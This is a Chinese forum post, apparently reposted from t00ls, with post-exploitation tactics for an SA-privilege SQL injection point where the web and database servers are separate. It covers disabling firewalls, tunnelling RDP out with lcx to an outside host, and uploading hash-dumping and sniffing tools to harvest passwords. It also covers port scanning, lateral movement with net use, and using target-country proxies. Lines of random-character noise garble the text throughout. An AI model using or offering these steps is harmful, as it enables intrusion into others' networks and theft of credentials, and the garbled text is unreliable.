当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
8 c8 R- ~7 h3 r+ z3 w7 b" h& y2 N7 p5 u$ u
! b# a" a4 e7 u& G g) ^/ ?0 F F. S, }6 A! z6 Y' C
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
& O7 K; z9 F0 L( p, T; e& v, V( [5 c) {/ l, M" s
) [. |& ?1 B4 C% W( C8 K# v一、DB机有公网IP.) B( o# q$ [& R
' d; d. @& c5 n8 @# \. V8 m1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.* B4 q. i, ~5 m' X$ k
4 A; G8 |3 q$ V) u+ P4 d& |/ ]5 }; S' h% J9 m2 ^+ `+ i
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.4 K. \3 m" u' R$ s
" U2 Z. d: G' p/ C: ?" j$ b g$ }( D5 }: \$ X
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com7 K7 x6 ^# s' Y. j* H
1 R- \6 {+ ^2 x$ L0 g9 l8 O3 x3 Z; Q( ]
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用., m; _" ]# A" V5 f3 j- p0 i
; R$ w. @) V2 a) W5 |% s4 f' M
3 c( a* D0 H4 f+ e; P( H' q# H" d% {
, U# y# |& O# M5 Z二、DB机只有内网IP
) B) a5 _- f5 _ R" V! K9 s% j$ s! I; c" L
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
0 \% R( _0 J6 e- U9 p' f# w! u/ c9 i+ V
3 c- R0 r8 |6 I& S2:停掉防火墙和IP策略再从内往外扫描.8 a+ c$ x& J0 H2 Q! s- R% Z3 {
0 d6 A1 V0 D! f
+ A6 ^8 v4 L' ~8 P
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
9 v) b$ J+ m7 m7 [7 G, `0 e+ Y# _) B$ N0 l+ C5 A" S
6 v: Z7 f9 }, W
4:学会密码规律分析往往会有惊喜.
0 p. K; m, X! j0 {$ P7 J& [8 B% V/ j5 {) S7 D4 Y9 a
$ I" l5 b, E$ r* S
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等( N1 M3 n [+ g
% Z6 V1 {. b, i' ]" V# y
) S& A; {. |+ b$ t0 X$ a( P有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |